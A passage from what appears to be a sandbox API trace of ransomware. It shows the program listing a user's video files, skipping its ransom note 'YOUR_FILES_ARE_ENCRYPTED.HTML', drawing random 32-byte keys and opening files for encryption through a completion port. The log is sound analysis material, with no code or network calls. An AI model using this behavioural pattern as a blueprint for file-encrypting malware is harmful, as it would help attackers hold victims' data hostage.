2 [0125.365] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="BB") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="F7") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A1") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="8E") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="52") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="2A") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="40") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="11") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="50") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="7D") returned 2 [0125.365] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="59") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="03") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B0") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="51") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="8B") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F1") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="49") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="CA") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="5B") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="16") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="E4") returned 2 [0125.366] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="07") returned 2 [0125.366] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4" [0125.366] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.366] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.369] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5d9870, ftCreationTime.dwHighDateTime=0x1d6fd39, ftLastAccessTime.dwLowDateTime=0xda364080, ftLastAccessTime.dwHighDateTime=0x1d6ff0b, ftLastWriteTime.dwLowDateTime=0xda364080, ftLastWriteTime.dwHighDateTime=0x1d6ff0b, nFileSizeHigh=0x0, nFileSizeLow=0x1337a, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="6qPFoHekN2is.mkv", cAlternateFileName="6QPFOH~1.MKV")) returned 1 [0125.370] StrStrIW (lpFirst="6qPFoHekN2is.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.370] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6qPFoHekN2is.mkv") returned 49 [0125.370] PathFindExtensionW (pszPath="6qPFoHekN2is.mkv") returned=".mkv" [0125.370] lstrlenW (lpString=".mkv") returned 4 [0125.370] PathFindExtensionW (pszPath="6qPFoHekN2is.mkv") returned=".mkv" [0125.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94b907c0, ftCreationTime.dwHighDateTime=0x1d7087c, ftLastAccessTime.dwLowDateTime=0x2a26f20, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2a26f20, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="6yHW9GQxoiwuW.swf", cAlternateFileName="6YHW9G~1.SWF")) returned 1 [0125.370] StrStrIW (lpFirst="6yHW9GQxoiwuW.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.370] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\6yHW9GQxoiwuW.swf") returned 50 [0125.370] PathFindExtensionW (pszPath="6yHW9GQxoiwuW.swf") returned=".swf" [0125.370] lstrlenW (lpString=".swf") returned 4 [0125.370] PathFindExtensionW (pszPath="6yHW9GQxoiwuW.swf") returned=".swf" [0125.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78562b0, ftCreationTime.dwHighDateTime=0x1d7037c, ftLastAccessTime.dwLowDateTime=0xa3721fb0, ftLastAccessTime.dwHighDateTime=0x1d7044c, ftLastWriteTime.dwLowDateTime=0xa3721fb0, ftLastWriteTime.dwHighDateTime=0x1d7044c, nFileSizeHigh=0x0, nFileSizeLow=0x3085, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="9s6SOe-h.swf", cAlternateFileName="")) returned 1 [0125.370] StrStrIW (lpFirst="9s6SOe-h.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.370] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\9s6SOe-h.swf") returned 45 [0125.370] PathFindExtensionW (pszPath="9s6SOe-h.swf") returned=".swf" [0125.370] lstrlenW (lpString=".swf") returned 4 [0125.370] PathFindExtensionW (pszPath="9s6SOe-h.swf") returned=".swf" [0125.370] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62184800, ftCreationTime.dwHighDateTime=0x1d6fb8c, ftLastAccessTime.dwLowDateTime=0x1f107ab0, ftLastAccessTime.dwHighDateTime=0x1d6ffdc, ftLastWriteTime.dwLowDateTime=0x1f107ab0, ftLastWriteTime.dwHighDateTime=0x1d6ffdc, nFileSizeHigh=0x0, nFileSizeLow=0x8989, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="BaTVdH1H2v8.flv", cAlternateFileName="BATVDH~1.FLV")) returned 1 [0125.370] StrStrIW (lpFirst="BaTVdH1H2v8.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.370] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv") returned 48 [0125.370] PathFindExtensionW (pszPath="BaTVdH1H2v8.flv") returned=".flv" [0125.370] lstrlenW (lpString=".flv") returned 4 [0125.370] PathFindExtensionW (pszPath="BaTVdH1H2v8.flv") returned=".flv" [0125.370] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\batvdh1h2v8.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.371] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=35209) returned 1 [0125.371] GetProcessHeap () returned 0x600000 [0125.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.372] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="67") returned 2 [0125.372] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="9F") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="4F") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="91") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="F8") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="9F") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="D2") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="02") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="02") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="68") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="77") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="42") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="20") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="E3") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="B5") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="CF") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9B") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="F8") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E5") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0A") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="FE") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="3A") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C3") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="2D") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="28") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="D3") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="2F") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="8A") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="8A") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="A1") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="AC") returned 2 [0125.372] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="06") returned 2 [0125.373] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv" [0125.373] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.378] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.387] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eccdf0, ftCreationTime.dwHighDateTime=0x1d6fb73, ftLastAccessTime.dwLowDateTime=0xc27b3de0, ftLastAccessTime.dwHighDateTime=0x1d7080e, ftLastWriteTime.dwLowDateTime=0xc27b3de0, ftLastWriteTime.dwHighDateTime=0x1d7080e, nFileSizeHigh=0x0, nFileSizeLow=0x12fbe, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="br 7.swf", cAlternateFileName="BR7~1.SWF")) returned 1 [0125.387] StrStrIW (lpFirst="br 7.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.387] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\br 7.swf") returned 41 [0125.387] PathFindExtensionW (pszPath="br 7.swf") returned=".swf" [0125.387] lstrlenW (lpString=".swf") returned 4 [0125.387] PathFindExtensionW (pszPath="br 7.swf") returned=".swf" [0125.387] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc61a5a00, ftCreationTime.dwHighDateTime=0x1d70613, ftLastAccessTime.dwLowDateTime=0x62967700, ftLastAccessTime.dwHighDateTime=0x1d70674, ftLastWriteTime.dwLowDateTime=0x62967700, ftLastWriteTime.dwHighDateTime=0x1d70674, nFileSizeHigh=0x0, nFileSizeLow=0x13512, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="CHbyW-s4LK4YuXu.avi", cAlternateFileName="CHBYW-~1.AVI")) returned 1 [0125.387] StrStrIW (lpFirst="CHbyW-s4LK4YuXu.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.387] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi") returned 52 [0125.388] PathFindExtensionW (pszPath="CHbyW-s4LK4YuXu.avi") returned=".avi" [0125.388] lstrlenW (lpString=".avi") returned 4 [0125.388] PathFindExtensionW (pszPath="CHbyW-s4LK4YuXu.avi") returned=".avi" [0125.388] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\chbyw-s4lk4yuxu.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.389] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=79122) returned 1 [0125.389] GetProcessHeap () returned 0x600000 [0125.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.390] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="35") returned 2 [0125.390] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="DC") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="3C") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="19") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="CE") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F4") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="35") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="EF") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="6D") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="A6") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="12") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="CE") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="2C") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="44") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CC") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="2B") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="82") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="F1") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="47") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="57") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="64") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="E0") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="78") returned 2 [0125.390] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="A4") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="AF") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="50") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="4B") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="E2") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="8B") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="DB") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="32") returned 2 [0125.391] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="2A") returned 2 [0125.391] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi" [0125.391] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.391] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.396] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6da59d30, ftCreationTime.dwHighDateTime=0x1d701a9, ftLastAccessTime.dwLowDateTime=0x1b8c6030, ftLastAccessTime.dwHighDateTime=0x1d704c2, ftLastWriteTime.dwLowDateTime=0x1b8c6030, ftLastWriteTime.dwHighDateTime=0x1d704c2, nFileSizeHigh=0x0, nFileSizeLow=0xba5e, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Ct98pwkcnPV0JiO9tM.avi", cAlternateFileName="CT98PW~1.AVI")) returned 1 [0125.396] StrStrIW (lpFirst="Ct98pwkcnPV0JiO9tM.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.396] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi") returned 55 [0125.396] PathFindExtensionW (pszPath="Ct98pwkcnPV0JiO9tM.avi") returned=".avi" [0125.396] lstrlenW (lpString=".avi") returned 4 [0125.396] PathFindExtensionW (pszPath="Ct98pwkcnPV0JiO9tM.avi") returned=".avi" [0125.396] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ct98pwkcnpv0jio9tm.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.400] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=47710) returned 1 [0125.400] GetProcessHeap () returned 0x600000 [0125.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.401] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="2A") returned 2 [0125.401] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="76") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DE") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="57") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E8") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="E9") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="47") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="90") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="CA") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="66") returned 2 [0125.401] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="D8") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="B4") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="AB") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="9F") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="A8") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="54") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="CE") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E0") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="96") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0E") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="B3") returned 2 [0125.409] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="0B") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="9C") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="84") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="6C") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="72") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="00") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="22") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="1B") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="5F") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="FE") returned 2 [0125.410] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="76") returned 2 [0125.410] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi" [0125.410] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.410] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.414] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.414] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.414] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini") returned 44 [0125.414] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.414] lstrlenW (lpString=".ini") returned 4 [0125.414] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.414] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.415] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=504) returned 1 [0125.415] CloseHandle (hObject=0x31c) returned 1 [0125.415] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x807af1f0, ftCreationTime.dwHighDateTime=0x1d7099f, ftLastAccessTime.dwLowDateTime=0xd8dcf3c0, ftLastAccessTime.dwHighDateTime=0x1d70a1c, ftLastWriteTime.dwLowDateTime=0xd8dcf3c0, ftLastWriteTime.dwHighDateTime=0x1d70a1c, nFileSizeHigh=0x0, nFileSizeLow=0x16d70, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="ekLgH-Jc.swf", cAlternateFileName="")) returned 1 [0125.415] StrStrIW (lpFirst="ekLgH-Jc.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.415] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ekLgH-Jc.swf") returned 45 [0125.416] PathFindExtensionW (pszPath="ekLgH-Jc.swf") returned=".swf" [0125.416] lstrlenW (lpString=".swf") returned 4 [0125.416] PathFindExtensionW (pszPath="ekLgH-Jc.swf") returned=".swf" [0125.416] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7e4a690, ftCreationTime.dwHighDateTime=0x1d70252, ftLastAccessTime.dwLowDateTime=0x37a71390, ftLastAccessTime.dwHighDateTime=0x1d708dd, ftLastWriteTime.dwLowDateTime=0x37a71390, ftLastWriteTime.dwHighDateTime=0x1d708dd, nFileSizeHigh=0x0, nFileSizeLow=0x17da0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="fdLgaB_0tvdqnpdx.mkv", cAlternateFileName="FDLGAB~1.MKV")) returned 1 [0125.416] StrStrIW (lpFirst="fdLgaB_0tvdqnpdx.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.416] 